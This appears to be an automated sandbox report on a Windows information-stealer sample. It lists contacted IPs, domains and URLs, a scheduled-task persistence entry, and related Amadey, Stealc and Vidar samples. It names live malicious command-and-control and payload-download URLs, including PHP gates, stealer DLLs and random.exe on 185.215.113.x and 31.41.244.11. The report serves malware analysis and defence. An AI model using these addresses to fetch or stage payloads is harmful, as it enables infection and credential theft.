http://185.215.113.206/c4becf79229cb002.php~u	100%	Avira URL Cloud	malware
http://31.41.244.11/files/random.exe0encodedD	0%	Avira URL Cloud	safe
http://185.215.113.206/c4becf79229cb002.phpKEHDHC.exeata;	100%	Avira URL Cloud	malware
http://185.215.113.206/c4becf79229cb002.phpgPreference.Verbt	100%	Avira URL Cloud	malware
http://185.215.113.206/68b591d6548ec281/mozglue.dllN7	100%	Avira URL Cloud	malware
http://31.41.244.11/files/random.exe3b31	0%	Avira URL Cloud	safe
http://31.41.244.11/files/random.exe3b3	0%	Avira URL Cloud	safe
http://185.215.113.206/68b591d6548ec281/msvcp140.dll9	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
chrome.cloudflare-dns.com	162.159.61.3	true	false	high
plus.l.google.com	172.217.17.78	true	false	high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	high
sb.scorecardresearch.com	18.165.220.110	true	false	high
www.google.com	142.250.181.100	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
googlehosted.l.googleusercontent.com	172.217.19.225	true	false	high
ax-0001.ax-msedge.net	150.171.27.10	true	false	high
clients2.googleusercontent.com	unknown	unknown	false	high
bzib.nelreports.net	unknown	unknown	false	high
assets.msn.com	unknown	unknown	false	high
c.msn.com	unknown	unknown	false	high
ntp.msn.com	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high
api.msn.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
http://185.215.113.206/68b591d6548ec281/softokn3.dll	false	high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732577146763&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true	false	high
http://185.215.113.206/	false	high
https://sb.scorecardresearch.com/b?rn=1732577146766&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0675AFABBF8562701E27BAE9BE8263C5&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239381741591_1LPZQNFJIC0J01PB0&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90	false	high
http://185.215.113.43/Zu7JuNko/index.php	false	high
http://185.215.113.206/68b591d6548ec281/freebl3.dll	false	high
http://185.215.113.206/68b591d6548ec281/nss3.dll	false	high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239402613046_1VJ8MQN6OLRO0EVHP&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90	false	high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732577154627&w=0&anoncknm=app_anon&NoResponseBody=true	false	high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732577154567&w=0&anoncknm=app_anon&NoResponseBody=true	false	high
https://bzib.nelreports.net/api/report?cat=bingbusiness	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239402415504_17DDWI2WCHUD2N4TB&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90	false	high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732577153624&w=0&anoncknm=app_anon&NoResponseBody=true	false	high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732577153628&w=0&anoncknm=app_anon&NoResponseBody=true	false	high
http://185.215.113.206/68b591d6548ec281/vcruntime140.dll	false	high
https://tse1.mm.bing.net/th?id=OADD2.10239378034177_1Y8HUQR0O0JRMMA4L&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90	false	high
https://clients2.googleusercontent.com/crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx	false	high
http://185.215.113.16/mine/random.exe	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.2457279124.00000000236CF000.00000004.00000020.00020000.00000000.sdmp, GHJDGDBF.0.dr, FHDAFIID.0.dr, Web Data.8.dr	false		high
https://c.msn.com/	2cc80dabc69f58b6_1.8.dr	false		high
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2457279124.00000000236CF000.00000004.00000020.00020000.00000000.sdmp, GHJDGDBF.0.dr, FHDAFIID.0.dr, Web Data.8.dr	false		high
http://www.broofa.com	chromecache_532.4.dr	false		high
https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
https://ntp.msn.com/0	000003.log.8.dr	false		high
https://ntp.msn.com/_default	QuotaManager.8.dr	false		high
https://www.last.fm/	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
https://deff.nelreports.net/api/report?cat=msn	2cc80dabc69f58b6_0.8.dr	false		high
https://ntp.msn.cn/edge/ntp	2cc80dabc69f58b6_1.8.dr	false		high
https://sb.scorecardresearch.com/	2cc80dabc69f58b6_1.8.dr	false		high
https://deff.nelreports.net/api/report	Reporting and NEL.9.dr	false		high
https://docs.google.com/	manifest.json0.8.dr	false		high
https://www.youtube.com	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
http://31.41.244.11/	skotes.exe, 00000020.00000002.3410736352.000000000112C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msnw	Reporting and NEL.9.dr	false		high
https://www.instagram.com	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
http://185.215.113.206/c4becf79229cb002.php~u	file.exe, 00000000.00000002.2720777420.0000000001113000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://web.skype.com/?browsername=edge_canary_shoreline	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
https://drive.google.com/	manifest.json0.8.dr	false		high
https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
http://185.215.113.206/68b591d6548ec281/freebl3.dllj7	file.exe, 00000000.00000002.2720777420.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
https://www.messenger.com	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
https://outlook.office.com/mail/compose?isExtension=true	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
https://unitedstates4.ss.wd.microsoft.us/	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.dr	false		high
https://i.y.qq.com/n2/m/index.html	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
https://www.deezer.com/	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
http://185.215.113.206/68b591d6548ec281/mozglue.dllN7	file.exe, 00000000.00000002.2720777420.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.206/c4becf79229cb002.phpgPreference.Verbt	file.exe, 00000000.00000002.2720777420.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://web.telegram.org/	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
http://www.mozilla.com/en-US/blocklist/	file.exe, 00000000.00000002.2749300757.00000000733BD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false		high
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false		high
https://drive-daily-2.corp.google.com/	manifest.json0.8.dr	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	EHJKFCGHIDHCBGDHJKEB.0.dr	false		high
http://185.215.113.206/c4becf79229cb002.phpKEHDHC.exeata;	file.exe, 00000000.00000002.2719068067.0000000000257000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: malware	unknown
https://drive-daily-4.corp.google.com/	manifest.json0.8.dr	false		high
https://vibe.naver.com/today	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
https://srtb.msn.com/	2cc80dabc69f58b6_1.8.dr	false		high
https://unitedstates1.ss.wd.microsoft.us/	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000002.2720777420.0000000001129000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2457279124.00000000236CF000.00000004.00000020.00020000.00000000.sdmp, GHJDGDBF.0.dr, FHDAFIID.0.dr, Web Data.8.dr	false		high
https://assets.msn.com	e4cdfaac-96a9-4551-87b6-68e32893b181.tmp.9.dr	false		high
https://www.ecosia.org/newtab/	FHDAFIID.0.dr	false		high
https://drive-daily-1.corp.google.com/	manifest.json0.8.dr	false		high
https://excel.new?from=EdgeM365Shoreline	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	EBFBFBFIIJDAKECAKKJEHCFIJK.0.dr	false		high
http://185.215.113.206ngineer	file.exe, 00000000.00000002.2719068067.0000000000257000.00000040.00000001.01000000.00000003.sdmp	false		high
https://drive-daily-5.corp.google.com/	manifest.json0.8.dr	false		high
https://play.google.com/log?format=json&hasfast=true	chromecache_532.4.dr	false		high
http://31.41.244.11/215.113.43/Zu7JuNko/index.php	skotes.exe, 00000020.00000002.3410736352.000000000112C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://31.41.244.11/files/random.exe0encodedD	skotes.exe, 00000020.00000002.3410736352.000000000112C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/chrome	content_new.js.8.dr, content.js.8.dr	false		high
https://www.tiktok.com/	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	EBFBFBFIIJDAKECAKKJEHCFIJK.0.dr	false		high
https://www.msn.com/web-notification-icon-light.png	2cc80dabc69f58b6_1.8.dr	false		high
http://31.41.244.11/files/random.exe3b31	skotes.exe, 00000020.00000002.3410736352.000000000112C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chromewebstore.google.com/	manifest.json.8.dr	false		high
https://drive-preprod.corp.google.com/	manifest.json0.8.dr	false		high
https://srtb.msn.cn/	2cc80dabc69f58b6_1.8.dr	false		high
https://msn.comXIDv10	Cookies.9.dr	false		high
https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
http://31.41.244.11/files/random.exe	skotes.exe, 00000020.00000002.3410736352.000000000112C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
https://chrome.google.com/webstore/	manifest.json.8.dr	false		high
https://y.music.163.com/m/	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
https://unitedstates2.ss.wd.microsoft.us/	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.dr	false		high
https://bard.google.com/	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
https://assets.msn.cn/resolver/	2cc80dabc69f58b6_1.8.dr	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	file.exe, 00000000.00000002.2744608109.0000000023724000.00000004.00000020.00020000.00000000.sdmp, EHJKFCGHIDHCBGDHJKEB.0.dr	false		high
https://browser.events.data.msn.com/	2cc80dabc69f58b6_1.8.dr	false		high
https://web.whatsapp.com	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
https://m.kugou.com/	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
https://www.office.com	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
https://outlook.live.com/mail/0/	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high
http://31.41.244.11/files/random.exe3b3	skotes.exe, 00000020.00000002.3410736352.000000000112C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.206/68b591d6548ec281/msvcp140.dll9	file.exe, 00000000.00000002.2720777420.00000000010F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ntp.msn.com/edge/ntp	000003.log.8.dr, 2cc80dabc69f58b6_1.8.dr	false		high
https://assets.msn.com/resolver/	2cc80dabc69f58b6_1.8.dr	false		high
https://powerpoint.new?from=EdgeM365Shoreline	e95448a7-6482-4c4d-90ba-fa31f5db8540.tmp.8.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
13.107.246.40	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.217.19.225	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
18.173.132.23	unknown	United States	3	MIT-GATEWAYSUS	false
162.159.61.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
23.209.72.32	unknown	United States	20940	AKAMAI-ASN1EU	false
23.44.133.38	unknown	United States	20940	AKAMAI-ASN1EU	false
20.110.205.119	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.217.17.78	plus.l.google.com	United States	15169	GOOGLEUS	false
2.16.158.169	unknown	European Union	20940	AKAMAI-ASN1EU	false
23.57.90.146	unknown	United States	35994	AKAMAI-ASUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
2.16.158.41	unknown	European Union	20940	AKAMAI-ASN1EU	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.117.182.56	unknown	United States	20940	AKAMAI-ASN1EU	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
13.107.246.63	s-part-0035.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
23.96.180.189	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
152.195.19.97	unknown	United States	15133	EDGECASTUS	false
23.57.90.152	unknown	United States	35994	AKAMAI-ASUS	false
204.79.197.219	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false
94.245.104.56	ssl.bingadsedgeextension-prod-europe.azurewebsites.net	United Kingdom	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
51.104.15.253	unknown	United Kingdom	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
23.57.90.161	unknown	United States	35994	AKAMAI-ASUS	false
142.250.181.100	www.google.com	United States	15169	GOOGLEUS	false
18.165.220.110	sb.scorecardresearch.com	United States	3	MIT-GATEWAYSUS	false

Private

IP
192.168.2.6
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562762
Start date and time:	2024-11-26 00:24:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@75/296@27/29
EGA Information:	Successful, ratio: 25%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 192.229.221.95, 199.232.210.172, 216.58.208.227, 172.217.17.46, 74.125.205.84, 34.104.35.123, 172.217.21.35, 172.217.19.234, 142.250.181.74, 172.217.19.10, 172.217.17.74, 142.250.181.106, 172.217.17.42, 172.217.21.42, 172.217.19.202, 142.250.181.42, 216.58.208.234, 172.217.19.170, 142.250.181.10, 142.250.181.138, 204.79.197.203, 13.107.42.16, 204.79.197.239, 13.107.21.239, 13.107.6.158, 172.165.69.228, 23.32.238.138, 2.19.198.56, 23.32.238.145, 23.32.238.161, 2.16.158.170, 2.16.158.88, 2.16.158.51, 2.16.158.35, 2.16.158.73, 2.16.158.80, 2.16.158.56, 2.16.158.90, 2.16.158.96, 95.100.135.99, 95.100.135.83, 95.100.135.97, 95.100.135.41, 95.100.135.65, 95.100.135.43, 95.100.135.107, 95.100.135.123, 95.100.135.105, 13.74.129.1, 13.107.21.237, 204.79.197.237, 20.234.120.54, 23.32.238.152, 23.32.238.105, 142.250.65.163, 142.250.80.35
Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, img-s-msn-com.akamaized.net, tse1.mm.bing.net, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, g.bing.com, prod-agic-us-2.uksouth.cloudapp.azure.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, ris-prod.trafficmanager.net, ogads-pa.googleapis.com, prod-atm-wds-edge.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, ris.api.iris.microsoft.com, edgedl.me.gvt1.com, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, a1847.dscd.akamai.net, config.edge.skype
Execution Graph export aborted for target DocumentsDBKKKEHDHC.exe, PID 9024 because it is empty
Execution Graph export aborted for target file.exe, PID 4592 because there are no executed function
Execution Graph export aborted for target skotes.exe, PID 5728 because there are no executed function
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
00:26:00	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
18:25:38	API Interceptor	146x Sleep call for process: file.exe modified
18:27:01	API Interceptor	107x Sleep call for process: skotes.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, DarkTortilla, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
13.107.246.40	Payment Transfer Receipt.shtml	Get hash	malicious	HTMLPhisher	Browse	www.aib.gov.uk/
	NEW ORDER.xls	Get hash	malicious	Unknown	Browse	2s.gg/3zs
	PO_OCF 408.xls	Get hash	malicious	Unknown	Browse	2s.gg/42Q
	06836722_218 Aluplast.docx.doc	Get hash	malicious	Unknown	Browse	2s.gg/3zk
	Quotation.xls	Get hash	malicious	Unknown	Browse	2s.gg/3zM

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
chrome.cloudflare-dns.com	uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
	0Xp3q1l7De.exe	Get hash	malicious	Remcos	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	94.245.104.56
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	94.245.104.56
sb.scorecardresearch.com	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	3.160.188.18
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	3.160.188.18
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.165.220.57
	0Xp3q1l7De.exe	Get hash	malicious	Remcos	Browse	18.165.220.110
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	18.165.220.110
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	18.165.220.110
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.165.220.57
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.165.220.57
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	18.165.220.106
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.165.220.57

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.pt/	Get hash	malicious	Unknown	Browse	104.18.95.41
	file.exe	Get hash	malicious	Unknown	Browse	172.67.187.240
	https://docs.google.com/drawings/d/1rnJTD83ySW2kuilnF4J1ffAp0B5BM7BM0Nvi8F8BbSI/preview?pli=1HeatherMitchell-andrew.tokar@overlakehospital.org	Get hash	malicious	HTMLPhisher	Browse	172.67.193.18
	IeccNv7PP6.exe	Get hash	malicious	Stealc, Vidar	Browse	172.67.179.207
	https://kkinternational.co.uk/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.187.240
	fbot.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	8.44.60.26
	6wjCYfcM3a.exe	Get hash	malicious	LummaC	Browse	172.67.160.80
	https://shorturl.at/ZbKEL?REVd=Vhx6ZLBnjMm	Get hash	malicious	Unknown	Browse	104.26.8.129
	https://avidgroup.famislnc.com/fvcvfxfec/cc6d843dfd/?1f9da=amtsZW1wQGNhcmlzbHMuY29t	Get hash	malicious	Unknown	Browse	172.67.69.226
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, DarkTortilla, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
